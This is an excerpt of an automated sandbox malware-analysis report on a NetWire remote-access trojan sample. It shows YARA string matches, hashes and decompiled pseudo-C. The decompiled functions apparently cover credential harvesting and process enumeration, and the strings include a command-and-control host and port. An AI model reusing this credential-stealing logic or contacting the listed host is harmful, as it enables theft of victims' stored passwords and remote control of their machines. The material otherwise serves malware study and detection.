                        • Instruction Fuzzy Hash: 28D1A3B4908341ABC710AF65C58965EFBF0BF84748F418C2EF8C897291D7B9D988CB56
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00408E7F Relevance: 10.1, Strings: 8, Instructions: 72COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $ $ $%Rand%$HostId$HostId-APRIL$Install Date$SOFTWARE\NetWire
                        • API String ID: 0-308283549
                        • Opcode ID: 8d9fa1ce1227cd48d07afd670ca600cc309de693e6a65e3e096cff891438ab6d
                        • Instruction ID: 4d253b419a98ff4c59b7894da0d5b96d3c68cf9a0106b0f9d5c8600cdd8dc3cd
                        • Opcode Fuzzy Hash: 8d9fa1ce1227cd48d07afd670ca600cc309de693e6a65e3e096cff891438ab6d
                        • Instruction Fuzzy Hash: BE3193B0109311ABD700AF11D68929FBBE1AF80748F51CC1EE5D85B256D7FE8588CB9B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00408B1A Relevance: 10.1, Strings: 8, Instructions: 58COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: &$001$064$075$C:\Users\user\AppData\Roaming\Logs\$HostId-APRIL$Password$chongmei33.myddns.rocks:49703;
                        • API String ID: 0-4217033083
                        • Opcode ID: 35587c5c701385df943a746cf7bb302fd0de4502a5840f6354f21f0f9562dd1c
                        • Instruction ID: d012676997c43d0a4f60e6223c36ad427c2154accf07b5176cb32dd979716e27
                        • Opcode Fuzzy Hash: 35587c5c701385df943a746cf7bb302fd0de4502a5840f6354f21f0f9562dd1c
                        • Instruction Fuzzy Hash: 3E3100B0109711AAD300EF56D2D925EBEE0BF84748F91CC2EE1C94B251C7F985C99B97
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040D745 Relevance: 9.0, Strings: 7, Instructions: 232COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $/$A$E$K$Software\Microsoft\Internet Explorer\IntelliForms\Storage2$rb+
                        • API String ID: 0-417429986
                        • Opcode ID: 17987caa90f594d4a55626d029de0f9e4765c5bc8f064db7406c04733c776cae
                        • Instruction ID: b3a366508a3bf55356eea0268f728a85e1b25c4e3c11778993a5dcbc8714eb01
                        • Opcode Fuzzy Hash: 17987caa90f594d4a55626d029de0f9e4765c5bc8f064db7406c04733c776cae
                        • Instruction Fuzzy Hash: B2A1C2B09083419BD710EFA5C18465BBBE0AF85358F00882EF5D897391D7B9D989DF4A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00408FE0 Relevance: 8.9, Strings: 7, Instructions: 156COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: "%s"$-m "%s"$C:\Users\user\AppData\Roaming\Logs\$M5QV9C5I$MT_qUDrj\F4Y0W6W85\DY542d Md5Qs\XR65CiidS PWlsWRdR56\%6$MT_qUDrj\F4Y0W6W85\U4RSWg6\PQ00dR5zd064WR\rQR\$rb+
                        • API String ID: 0-740420096
                        • Opcode ID: 997c129668c957d265a6ef581973f80193b3a19ca8de808bc7fa0e786e146993
                        • Instruction ID: cf1332e757baf714fb04fabdc2a14f291af18396ddc48b811abeeedaa7cc8274
                        • Opcode Fuzzy Hash: 997c129668c957d265a6ef581973f80193b3a19ca8de808bc7fa0e786e146993
                        • Instruction Fuzzy Hash: 4D61C7B04087119AD710BF61D64536EBBE1AF81348F41C86EE4C86B383CBBD8985DB5B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00413748 Relevance: 8.9, Strings: 7, Instructions: 132COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $C:\Users\user\AppData\Roaming\Logs\$PATH$Password$Unknown$WINDIR$chongmei33.myddns.rocks:49703;
                        • API String ID: 0-1034412746
                        • Opcode ID: 1d897faeec5f9ead515169eab6bed68e0673cd8fb9b034d1bed7294f75ea0837
                        • Instruction ID: 88353113fceb9506f3b36d61bfde8eef9921c9a466ae1bfd82caa565229af05a
                        • Opcode Fuzzy Hash: 1d897faeec5f9ead515169eab6bed68e0673cd8fb9b034d1bed7294f75ea0837
                        • Instruction Fuzzy Hash: A2619CB49087849BD720EF65C18469EFBE0BF89348F408D2EE8D887351E7789548CF5A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401421 Relevance: 8.9, Strings: 7, Instructions: 101COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: %$%$%s\%s.%s$TEMP$\$s$s
                        • API String ID: 0-3075679649
                        • Opcode ID: 89cb20cf2dea8ad77aae30bef6cdbecb0b37b5e693641a521aedb572dfca6291
                        • Instruction ID: f04d716bfdf1a3b2f19b14ba05fef692e22545d8b3c1490e52eb58049ae1adaa
                        • Opcode Fuzzy Hash: 89cb20cf2dea8ad77aae30bef6cdbecb0b37b5e693641a521aedb572dfca6291
                        • Instruction Fuzzy Hash: 435196B040C385DEE720EF25D54879EBBE0BF84348F408D2EE5D887281E7B99588DB56
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040DCE9 Relevance: 7.9, Strings: 6, Instructions: 395COMMON
                        Download Yara Rule
                        C-Code - Quality: 15%
                        			E0040DCE9(signed int __edx, void* _a4) {
				intOrPtr* _v52;
				char _v488;
				char _v492;
				char _v684;
				char _v908;
				char _v1032;
				char _v1036;
				void _v1068;
				void _v1084;
				void _v1092;
				void _v1096;
				void _v1100;
				void _v1104;
				void _v1108;
				char _v1132;
				char _v1136;
				char _v1148;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				intOrPtr _v1172;
				intOrPtr _v1176;
				char* _v1180;
				signed int _v1188;
				intOrPtr* _v1196;
				intOrPtr _v1204;
				signed int _v1212;
				signed int _v1220;
				char* _v1224;
				void _v1228;
				void _v1232;
				void _v1236;
				signed char _v1240;
				void* _v1244;
				signed char _v1248;
				intOrPtr _v1252;
				void _v1256;
				void _v1264;
				void _v1268;
				signed char _v1272;
				char* _v1276;
				signed char _v1280;
				intOrPtr _v1284;
				void _v1288;
				void _v1296;
				char* _v1300;
				signed char _v1304;
				char* _v1308;
				signed char _v1312;
				intOrPtr _v1316;
				void _v1320;
				void _v1324;
				void _v1328;
				void* _v1332;
				void _v1336;
				void _v1340;
				char _v1344;
				char _v1348;
				signed char _v1352;
				signed char _v1356;
				void _v1360;
				signed char _v1364;
				signed char _v1368;
				void _v1372;
				signed char _v1376;
				void _v1380;
				void _v1384;
				signed char _v1396;
				signed char _v1400;
				char* _v1404;
				char* _v1408;
				char* _v1412;
				char _v1416;
				char* _t211;
				char* _t212;
				intOrPtr* _t213;
				void* _t214;
				intOrPtr* _t215;
				char _t216;
				void* _t217;
				signed int _t218;
				void _t224;
				void* _t229;
				void* _t233;
				void* _t250;
				char* _t251;
				intOrPtr _t257;
				void* _t278;
				void _t279;
				signed char _t285;
				void* _t288;
				intOrPtr* _t289;
				char* _t290;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed char _t299;
				void _t301;
				signed char _t303;
				intOrPtr* _t310;
				signed char _t311;
				intOrPtr _t312;
				signed char _t313;
				char* _t316;
				void* _t317;
				char* _t318;
				signed char _t319;
				char _t320;
				void* _t321;
				char** _t324;
				void* _t326;
				void* _t329;

				_t295 = __edx;
				_v1108 = 0;
				 *(memcpy( &_v1084, 0x4228a0, 4 << 2)) = 0;
				_v1104 = 0;
				_v1100 = 0;
				_v1096 = 0;
				_v1092 = 0;
				memcpy( &_v1068, 0x4228b0, 4 << 2);
				_t324 = _t321 - 0x48c + 0x18;
				_t211 = E004081AA("2CQi5Yi4.Sii");
				_v1180 = _t211;
				L0041F55C();
				_t316 = _t211;
				_t212 = 0;
				_push(_t288);
				if(_t316 == 0) {
					L38:
					return _t212;
				}
				 *_t324 = "zCQi5TsdRzCQi5";
				_t213 = E004081AA();
				 *_t324 = _t316;
				_v1180 = _t213;
				L0041F5AC();
				_push(_t295);
				_t310 = _t213;
				 *_t324 = "zCQi5PiW6dzCQi5";
				_t214 = E004081AA(_t295);
				 *_t324 = _t316;
				_v1188 = _t214;
				L0041F5AC();
				_push(0);
				 *_t324 = "zCQi5jRQld0C5dX5dl6";
				_v1148 = _t214;
				_t215 = E004081AA(0);
				 *_t324 = _t316;
				_v1196 = _t215;
				L0041F5AC();
				_push(_t288);
				_t289 = _t215;
				 *_t324 = "zCQi5Ed5X5dl";
				_t216 = E004081AA(_t288);
				 *_t324 = _t316;
				_v1204 = _t216;
				L0041F5AC();
				_push(_t317);
				 *_t324 = "zCQi5Ed5X5dl";
				_v1160 = _t216;
				_t217 = E004081AA(_t317);
				 *_t324 = _t316;
				_v1212 = _t217;
				L0041F5AC();
				_push(_t295);
				_v1224 = "zCQi5_0dd";
				_v1164 = _t217;
				_t218 = E004081AA(_t295);
				_v1224 = _t316;
				_v1220 = _t218;
				L0041F5AC();
				_push(0);
				_push(0);
				_t296 = _t295 & 0xffffff00 | _t310 == 0x00000000;
				_v1188 = _t218;
				_t297 = _t296 & 0xffffff00 | _v1180 == 0x00000000;
				_t298 = _t297 & 0xffffff00 | _v1176 == 0x00000000;
				_t299 = _t298 & 0xffffff00 | _v1172 == 0x00000000;
				if((_t218 & 0xffffff00 | _t289 == 0x00000000 | _t296 | _t297 | _t298 | _t299) != 0 || _v1188 == 0) {
					L3:
					_t290 = 0;
					goto L33;
				} else {
					_v1228 = 0;
					_v1224 =  &_v1156;
					_v1232 =  &_v1136;
					_t229 =  *_t310();
					_t324 = _t324 - 0xc;
					if(_t229 != 0) {
						goto L3;
					}
					_v1240 = 0x200;
					_v1232 =  &_v1160;
					_v1236 =  &_v1164;
					_v1244 = _v1168;
					_t233 =  *_t289();
					_t324 = _t324 - 0x10;
					if(_t233 != 0 || _v1180 == 0) {
						goto L3;
					} else {
						if(E004132E6(0, _t299) != 0xa) {
							if(E004132E6(0, _t299) == 0xc || E004132E6(0, _t299) == 0xb || E004132E6(0, _t299) == 0xe || E004132E6(0, _t299) == 0xd || E004132E6(0, _t299) == 0xf) {
								goto L8;
							} else {
								_v1212 = 0;
								_t290 = 0;
								while(_v1212 < _v1180) {
									_v1252 = 0x10;
									_t299 = _v1212 * 0x34 + _v1176;
									_v1256 =  &_v1148;
									 *_t324 = _t299;
									_t313 = _t299;
									if(E004129C0() == 0) {
										_v1232 = 0;
										_v1236 = 0;
										_v1240 = 0x100;
										_v1248 = 0xffffffff;
										_v1244 =  &_v1132;
										_v1256 = 0;
										 *_t324 = 0;
										_v1252 =  *((intOrPtr*)(_t313 + 0x10));
										L0041F4DC();
										_t329 = _t324 - 0x20;
										_v1264 = 0;
										_v1268 = 0;
										_v1272 = 0x100;
										_v1280 = 0xffffffff;
										_v1276 =  &_v908;
										_v1288 = 0;
										 *_t329 = 0;
										_v1284 =  *((intOrPtr*)(_t313 + 0x14)) + 0x20;
										L0041F4DC();
										_t319 =  &_v684;
										_v1296 = 0;
										_v1300 = 0;
										_v1304 = 0x100;
										_v1312 = 0xffffffff;
										_v1308 = _t319;
										_v1320 = 0;
										_v1324 = 0;
										_v1316 =  *((intOrPtr*)(_t313 + 0x18)) + 0x20;
										L0041F4DC();
										_v1336 = 0;
										_v1340 = 0;
										_v1268 = 0;
										_v1332 =  &_v1268;
										_v1344 =  *((intOrPtr*)(_t313 + 0x18));
										_v1352 = _t313;
										_v1348 =  *((intOrPtr*)(_t313 + 0x14));
										_v1356 = _v1280;
										_t278 = _v1300();
										_t324 = _t329 - 0xffffffffffffffe4;
										if(_t278 == 0) {
											_t303 =  &_v488;
											_v1356 = 0;
											_v1360 = 0;
											_v1364 = 0x100;
											_v1368 = _t303;
											_v1372 = 0xffffffff;
											_v1380 = 0;
											_v1384 = 0;
											_v1324 = _t303;
											_v1376 =  *((intOrPtr*)(_v1296 + 0x1c)) + 0x20;
											L0041F4DC();
											_t324 = _t324 - 0x20;
											_t299 = _v1356;
											_v1400 = _t319;
											_t320 =  &_v1324;
											_v1408 = 2;
											_v1412 = 0x4239a1;
											_v1404 =  &_v1032;
											_v1324 = 0;
											_v1396 = _t299;
											_v1416 = _t320;
											_t285 = E00412755( &_v1032);
											_t313 = _t285;
											if(_t285 != 0xffffffff) {
												_v1404 = _t285;
												_v1412 = _t290;
												_v1400 = 1;
												_v1408 = _t320;
												_t290 = _t290 + _t313;
												_v1416 =  &_v1344;
												_v1344 = E00412ABF(0);
											}
										}
										_t279 = _v1296;
										if(_t279 != 0) {
											_v1384 = _t279;
											_v1340();
											_push(_t313);
										}
									}
									_v1336 =  &(1[_v1336]);
								}
								L33:
								_t224 = _v1148;
								if(_t224 != 0) {
									_v1232 = _t224;
									_t224 = _v1188();
									_push(0);
								}
								if(_v1156 != 0) {
									_v1232 =  &_v1156;
									_t224 = _v1180();
									_push(_t299);
								}
								_v1232 = _t316;
								L0041F614();
								_push(_t224);
								 *_v52 = _t290;
								_t212 = _v1164;
								goto L38;
							}
						}
						L8:
						_v1212 = 0;
						_t290 = 0;
						while(_v1212 < _v1180) {
							_v1252 = 0x10;
							_t299 = _v1212 * 0x38 + _v1176;
							_v1256 =  &_v1148;
							 *_t324 = _t299;
							_t311 = _t299;
							if(E004129C0() == 0) {
								_v1232 = 0;
								_v1236 = 0;
								_v1240 = 0x100;
								_v1248 = 0xffffffff;
								_v1244 =  &_v1132;
								_v1256 = 0;
								 *_t324 = 0;
								_v1252 =  *((intOrPtr*)(_t311 + 0x10));
								L0041F4DC();
								_t326 = _t324 - 0x20;
								_v1264 = 0;
								_v1268 = 0;
								_v1272 = 0x100;
								_v1280 = 0xffffffff;
								_v1276 =  &_v908;
								_v1288 = 0;
								 *_t326 = 0;
								_v1284 =  *((intOrPtr*)(_t311 + 0x14)) + 0x20;
								L0041F4DC();
								_t318 =  &_v684;
								_v1296 = 0;
								_v1300 = 0;
								_v1304 = 0x100;
								_v1312 = 0xffffffff;
								_v1308 = _t318;
								_v1320 = 0;
								_v1324 = 0;
								_v1316 =  *((intOrPtr*)(_t311 + 0x18)) + 0x20;
								L0041F4DC();
								_v1332 = 0;
								_v1336 = 0;
								_v1340 = 0;
								_v1268 = 0;
								_v1328 =  &_v1268;
								_v1344 =  *((intOrPtr*)(_t311 + 0x18));
								_v1352 = _t311;
								_v1348 =  *((intOrPtr*)(_t311 + 0x14));
								_v1356 = _v1280;
								_t250 = _v1296();
								_t324 = _t326 - 0xffffffffffffffe0;
								if(_t250 == 0) {
									_t301 =  &_v492;
									_v1360 = 0;
									_v1364 = 0;
									_v1368 = 0x100;
									_v1372 = _t301;
									_v1376 = 0xffffffff;
									_v1384 = 0;
									 *_t324 = 0;
									_v1332 = _t301;
									_v1380 = _v1300[0x1c] + 0x20;
									L0041F4DC();
									_t324 = _t324 - 0x20;
									_t299 = _v1364;
									_v1404 = _t318;
									_t318 =  &_v1328;
									_v1412 = 2;
									_v1416 = 0x4239a1;
									_v1408 =  &_v1036;
									_v1328 = 0;
									_v1400 = _t299;
									 *_t324 = _t318;
									_t257 = E00412755( &_v1036);
									_t312 = _t257;
									if(_t257 != 0xffffffff) {
										_v1408 = _t257;
										_v1416 = _t290;
										_v1404 = 1;
										_v1412 = _t318;
										_t290 = _t290 + _t312;
										 *_t324 =  &_v1348;
										_v1348 = E00412ABF(0);
									}
								}
								_t251 = _v1300;
								if(_t251 != 0) {
									 *_t324 = _t251;
									_v1344();
									_push(_t318);
								}
							}
							_v1340 =  &(1[_v1340]);
						}
						goto L33;
					}
				}
			}





















































































































                        0x0040dce9
                        0x0040dd08
                        0x0040dd20
                        0x0040dd26
                        0x0040dd2e
                        0x0040dd36
                        0x0040dd3e
                        0x0040dd46
                        0x0040dd46
                        0x0040dd4f
                        0x0040dd54
                        0x0040dd57
                        0x0040dd5c
                        0x0040dd5e
                        0x0040dd60
                        0x0040dd63
                        0x0040e3aa
                        0x0040e3b4
                        0x0040e3b4
                        0x0040dd69
                        0x0040dd70
                        0x0040dd75
                        0x0040dd78
                        0x0040dd7c
                        0x0040dd81
                        0x0040dd83
                        0x0040dd85
                        0x0040dd8c
                        0x0040dd91
                        0x0040dd94
                        0x0040dd98
                        0x0040dd9d
                        0x0040dd9f
                        0x0040dda6
                        0x0040ddaa
                        0x0040ddaf
                        0x0040ddb2
                        0x0040ddb6
                        0x0040ddbb
                        0x0040ddbd
                        0x0040ddbf
                        0x0040ddc6
                        0x0040ddcb
                        0x0040ddce
                        0x0040ddd2
                        0x0040ddd7
                        0x0040ddd9
                        0x0040dde0
                        0x0040dde4
                        0x0040dde9
                        0x0040ddec
                        0x0040ddf0
                        0x0040ddf5
                        0x0040ddf7
                        0x0040ddfe
                        0x0040de02
                        0x0040de07
                        0x0040de0a
                        0x0040de0e
                        0x0040de15
                        0x0040de16
                        0x0040de17
                        0x0040de1c
                        0x0040de2a
                        0x0040de34
                        0x0040de3e
                        0x0040de43
                        0x0040de4c
                        0x0040de4c
                        0x00000000
                        0x0040de53
                        0x0040de57
                        0x0040de5f
                        0x0040de67
                        0x0040de6a
                        0x0040de6c
                        0x0040de71
                        0x00000000
                        0x00000000
                        0x0040de77
                        0x0040de7f
                        0x0040de87
                        0x0040de8f
                        0x0040de92
                        0x0040de94
                        0x0040de99
                        0x00000000
                        0x0040dea2
                        0x0040deaa
                        0x0040dec0
                        0x00000000
                        0x0040deea
                        0x0040deea
                        0x0040def2
                        0x0040e164
                        0x0040e142
                        0x0040e14a
                        0x0040e14e
                        0x0040e152
                        0x0040e155
                        0x0040e15e
                        0x0040e17a
                        0x0040e182
                        0x0040e18a
                        0x0040e192
                        0x0040e19a
                        0x0040e1a1
                        0x0040e1a9
                        0x0040e1b0
                        0x0040e1b4
                        0x0040e1b9
                        0x0040e1c3
                        0x0040e1cb
                        0x0040e1d3
                        0x0040e1db
                        0x0040e1e3
                        0x0040e1ea
                        0x0040e1f2
                        0x0040e1fc
                        0x0040e200
                        0x0040e208
                        0x0040e20f
                        0x0040e217
                        0x0040e21f
                        0x0040e227
                        0x0040e22f
                        0x0040e236
                        0x0040e23e
                        0x0040e248
                        0x0040e24c
                        0x0040e258
                        0x0040e260
                        0x0040e268
                        0x0040e270
                        0x0040e277
                        0x0040e27e
                        0x0040e282
                        0x0040e28a
                        0x0040e28d
                        0x0040e291
                        0x0040e296
                        0x0040e2a0
                        0x0040e2a7
                        0x0040e2af
                        0x0040e2b7
                        0x0040e2bf
                        0x0040e2c3
                        0x0040e2ce
                        0x0040e2d6
                        0x0040e2dd
                        0x0040e2e4
                        0x0040e2e8
                        0x0040e2ed
                        0x0040e2f0
                        0x0040e2f4
                        0x0040e2ff
                        0x0040e303
                        0x0040e30b
                        0x0040e313
                        0x0040e317
                        0x0040e31f
                        0x0040e323
                        0x0040e326
                        0x0040e32e
                        0x0040e330
                        0x0040e332
                        0x0040e33a
                        0x0040e33e
                        0x0040e346
                        0x0040e34a
                        0x0040e34c
                        0x0040e354
                        0x0040e354
                        0x0040e330
                        0x0040e358
                        0x0040e35e
                        0x0040e364
                        0x0040e367
                        0x0040e36b
                        0x0040e36b
                        0x0040e35e
                        0x0040e160
                        0x0040e160
                        0x0040e371
                        0x0040e371
                        0x0040e377
                        0x0040e379
                        0x0040e37c
                        0x0040e380
                        0x0040e380
                        0x0040e386
                        0x0040e38c
                        0x0040e38f
                        0x0040e393
                        0x0040e393
                        0x0040e394
                        0x0040e397
                        0x0040e39c
                        0x0040e3a4
                        0x0040e3a6
                        0x00000000
                        0x0040e3a6
                        0x0040dec0
                        0x0040deac
                        0x0040deac
                        0x0040deb4
                        0x0040df24
                        0x0040df02
                        0x0040df0a
                        0x0040df0e
                        0x0040df12
                        0x0040df15
                        0x0040df1e
                        0x0040df3a
                        0x0040df42
                        0x0040df4a
                        0x0040df52
                        0x0040df5a
                        0x0040df61
                        0x0040df69
                        0x0040df70
                        0x0040df74
                        0x0040df79
                        0x0040df83
                        0x0040df8b
                        0x0040df93
                        0x0040df9b
                        0x0040dfa3
                        0x0040dfaa
                        0x0040dfb2
                        0x0040dfbc
                        0x0040dfc0
                        0x0040dfc8
                        0x0040dfcf
                        0x0040dfd7
                        0x0040dfdf
                        0x0040dfe7
                        0x0040dfef
                        0x0040dff6
                        0x0040dffe
                        0x0040e008
                        0x0040e00c
                        0x0040e018
                        0x0040e020
                        0x0040e028
                        0x0040e030
                        0x0040e038
                        0x0040e03f
                        0x0040e046
                        0x0040e04a
                        0x0040e052
                        0x0040e055
                        0x0040e059
                        0x0040e05e
                        0x0040e068
                        0x0040e06f
                        0x0040e077
                        0x0040e07f
                        0x0040e087
                        0x0040e08b
                        0x0040e096
                        0x0040e09e
                        0x0040e0a5
                        0x0040e0ac
                        0x0040e0b0
                        0x0040e0b5
                        0x0040e0b8
                        0x0040e0bc
                        0x0040e0c7
                        0x0040e0cb
                        0x0040e0d3
                        0x0040e0db
                        0x0040e0df
                        0x0040e0e7
                        0x0040e0eb
                        0x0040e0ee
                        0x0040e0f6
                        0x0040e0f8
                        0x0040e0fa
                        0x0040e102
                        0x0040e106
                        0x0040e10e
                        0x0040e112
                        0x0040e114
                        0x0040e11c
                        0x0040e11c
                        0x0040e0f8
                        0x0040e120
                        0x0040e126
                        0x0040e12c
                        0x0040e12f
                        0x0040e133
                        0x0040e133
                        0x0040e126
                        0x0040df20
                        0x0040df20
                        0x00000000
                        0x0040df24
                        0x0040de99

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 2CQi5Yi4.Sii$zCQi5Ed5X5dl$zCQi5PiW6dzCQi5$zCQi5TsdRzCQi5$zCQi5_0dd$zCQi5jRQld0C5dX5dl6
                        • API String ID: 0-1136301387
                        • Opcode ID: 87aafaf84040a22bc4a574d69e3875252030c0c31ccf32c7b5f1b702cec560f4
                        • Instruction ID: 0411f2c87eaa10a6bc819440aee1928311a11f64f3fd3897648e7812cf6e01f9
                        • Opcode Fuzzy Hash: 87aafaf84040a22bc4a574d69e3875252030c0c31ccf32c7b5f1b702cec560f4
                        • Instruction Fuzzy Hash: 6802ADB04087419FD310EF6AC58875BBBE4BF84358F108D2EF4948B291E7B9D5898F96
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040FE8C Relevance: 7.7, Strings: 6, Instructions: 184COMMON
                        Download Yara Rule
                        C-Code - Quality: 49%
                        			E0040FE8C(signed int __eax, void* __ecx, void* __edx) {
				intOrPtr _v4;
				intOrPtr _v56;
				char _v560;
				char _v1108;
				void* _v1364;
				char _v1368;
				signed int _v1396;
				char _v1404;
				char _v1432;
				char _v1436;
				char _v1444;
				signed short _v1448;
				signed short _v1450;
				signed short _v1452;
				signed short _v1454;
				signed short _v1458;
				signed short _v1460;
				char _v1464;
				char* _v1468;
				char _v1476;
				intOrPtr _v1480;
				char* _v1488;
				char* _v1496;
				char _v1500;
				intOrPtr _v1504;
				void* _v1508;
				signed int _v1512;
				signed int _v1516;
				signed int _v1520;
				signed int _v1524;
				signed int _v1528;
				signed int _v1532;
				signed int _v1536;
				signed int _v1540;
				signed int _v1544;
				char* _v1548;
				intOrPtr _v1552;
				char _v1556;
				char* _t79;
				void* _t82;
				intOrPtr* _t84;
				signed int _t85;
				signed int _t87;
				void* _t93;
				signed int _t94;
				signed int _t102;
				void* _t111;
				void* _t112;
				char* _t116;
				void* _t117;
				char* _t119;
				intOrPtr* _t121;
				char* _t123;
				char* _t124;
				signed int _t127;
				intOrPtr* _t128;
				void* _t129;

				_t118 = __edx;
				_t117 = __ecx;
				_v1496 = 0;
				_v1500 = 2;
				L0041F664();
				_push(__edx);
				_push(__edx);
				if(__eax == 0xffffffff) {
					L3:
					_v1496 = 0;
					return E00405D7D(_t118, _v4, 0xbf, 0);
				}
				_t115 = __eax;
				_t79 =  &_v1364;
				_v1364 = 0x128;
				_v1508 = __eax;
				_v1504 = _t79;
				L0041F52C();
				_push(_t126);
				if(_t79 != 0) {
					E0041236C( &_v1432,  &_v1432, 0x8000);
					_t82 = E004081AA("Ed5FWSQid_4idLCldjfD");
					_t84 = E00407F8E(_t118, E00407F7A(_t118, "psapi.dll"), _t82);
					_t121 = _t84;
					if(_t84 == 0) {
						_t112 = E004081AA("Ed5FWSQid_4idLCldjfD");
						_t121 = E00407F8E(_t118, E00407F7A(_t118, "kernel32.dll"), _t112);
					}
					_t127 =  &_v560;
					do {
						_t85 = _v1364;
						_v1512 = 0;
						_v1516 = 0x410;
						_v1508 = _t85;
						L0041F53C();
						_t129 = _t128 - 0xc;
						_t123 = _t85;
						if(_t85 == 0 || _t121 == 0) {
							L10:
							E00412548(_t127, 0x424374, 0x204);
							goto L11;
						} else {
							_v1516 = 0x204;
							_v1520 = _t127;
							_v1524 = 0;
							_v1528 = _t85;
							_t111 =  *_t121();
							_t129 = _t129 - 0x10;
							if(_t111 != 0) {
								L11:
								_t87 =  &_v1452;
								_t119 =  &_v1460;
								_v1528 = _t123;
								_v1512 = _t87;
								_v1516 = _t87;
								_v1520 = _t87;
								_v1524 = _t119;
								_v1468 = _t119;
								L0041F5A4();
								_t128 = _t129 - 0x14;
								if(_t87 == 0) {
									L23:
									E00412548( &_v1436, 0x424374, 0x20);
									goto L14;
								}
								_t119 = _v1488;
								if(_v1480 == 0) {
									goto L23;
								}
								_t102 =  &_v1452;
								_v1548 = _t119;
								_v1544 = _t102;
								L0041F644();
								_push(_t102);
								_push(_t102);
								_v1548 = "%.2d/%.2d/%d %.2d:%.2d:%.2d";
								_v1552 = 0x20;
								_v1524 = _v1448 & 0x0000ffff;
								_v1528 = _v1450 & 0x0000ffff;
								_v1532 = _v1452 & 0x0000ffff;
								_v1536 = _v1460 & 0x0000ffff;
								_v1540 = _v1458 & 0x0000ffff;
								_v1544 = _v1454 & 0x0000ffff;
								_v1556 =  &_v1444;
								E004127A8();
								goto L14;
							}
							goto L10;
						}
						L14:
						if(_t123 != 0) {
							_v1548 = _t123;
							L0041F694();
							_push(_t123);
						}
						_t124 =  &_v1108;
						_v1528 = _t127;
						_v1540 = 0x424376;
						_v1544 = 0x204;
						_v1524 =  &_v1436;
						_v1548 = _t124;
						_v1532 = _v1396;
						_v1536 =  &_v1368;
						_t93 = E004127A8();
						if(_t93 > 0) {
							E00412458( &_v1464, _t119,  &_v1464, _t124, _t93);
						}
						_t94 =  &_v1404;
						_v1548 = _t115;
						_v1544 = _t94;
						L0041F524();
						_push(_t117);
						_push(_t117);
					} while (_t94 != 0);
					_v1556 = _t115;
					L0041F694();
					_push(_t119);
					_t116 =  &_v1476;
					if(_v1468 == 0) {
						_v1548 = 0;
						_v1552 = 0;
						_v1556 = 0xbf;
					} else {
						 *_t128 = _t116;
						_v1548 = E00412540();
						_v1556 = 0xbe;
						_v1552 = _v1476;
					}
					 *_t128 = _v56;
					E00405D7D(_t119);
					 *_t128 = _t116;
					return E004123B1();
				}
				_v1516 = __eax;
				L0041F694();
				goto L3;
			}




























































                        0x0040fe8c
                        0x0040fe8c
                        0x0040fe96
                        0x0040fe9e
                        0x0040fea5
                        0x0040fead
                        0x0040feae
                        0x0040feaf
                        0x0040fee0
                        0x0040fee7
                        0x00000000
                        0x0040ff02
                        0x0040feb1
                        0x0040feb3
                        0x0040feba
                        0x0040fec5
                        0x0040fec8
                        0x0040fecc
                        0x0040fed4
                        0x0040fed5
                        0x0040ff1b
                        0x0040ff27
                        0x0040ff41
                        0x0040ff48
                        0x0040ff4a
                        0x0040ff53
                        0x0040ff72
                        0x0040ff72
                        0x0040ff74
                        0x0040ff7b
                        0x0040ff7b
                        0x0040ff82
                        0x0040ff8a
                        0x0040ff91
                        0x0040ff95
                        0x0040ff9a
                        0x0040ff9f
                        0x0040ffa1
                        0x0040ffc7
                        0x0040ffda
                        0x00000000
                        0x0040ffa7
                        0x0040ffa7
                        0x0040ffaf
                        0x0040ffb3
                        0x0040ffbb
                        0x0040ffbe
                        0x0040ffc0
                        0x0040ffc5
                        0x0040ffdf
                        0x0040ffdf
